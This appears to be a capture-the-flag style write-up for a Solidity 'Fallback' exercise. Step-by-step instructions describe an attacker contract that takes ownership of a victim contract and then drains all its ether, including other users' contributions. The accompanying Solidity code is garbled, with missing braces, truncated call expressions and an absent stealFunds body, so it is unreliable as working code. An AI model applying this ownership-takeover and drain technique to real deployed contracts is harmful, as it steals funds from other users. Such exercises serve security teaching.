How to run:
- Deploy “Fallback” contract and copy the address
- Put this address as the value for Solution.fallbackContract state variable
- Deploy “Solution” contract along with 500 wei
- Run Solution.tellVictimBalance() – should return 0 wei
- Run Solution.tellAttackerBalance() – should return 500 wei
- Check the value of Fallback.owner – should show the address that deployed “Fallback” contract
- Run Solution.becomeOwner()
- Check the value of Fallback.owner – Should return address of “Solution” contract
- Run Solution.tellVictimBalance() – should return 200 wei
- Run Solution.tellAttackerBalance() – should return 300 wei
- Run Solution.stealFunds(). This will steal ALL ether from the contract includng contributions made by other users
- Run Solution.tellVictimBalance() – should return 0 wei
- Run Solution.tellAttackerBalance() – should return 500 wei.
// SPDX-License-Identifier: MIT
pragma solidity 0.8.10;
contract Solution
address fallbackContract = 0xd9145CCE52D386f254917e481eB44e9943F39138;
constructor() payable{}
function becomeOwner() public
{{value: 100 wei}(abi.encodeWithSignature("contribute()"));{value: 100 wei}("");
function stealFunds() public
fallback() external payable {}
function tellAttackerBalance() public view returns(uint)
return address(this).balance;
function tellVictimBalance() public view returns(uint)
return fallbackContract.balance;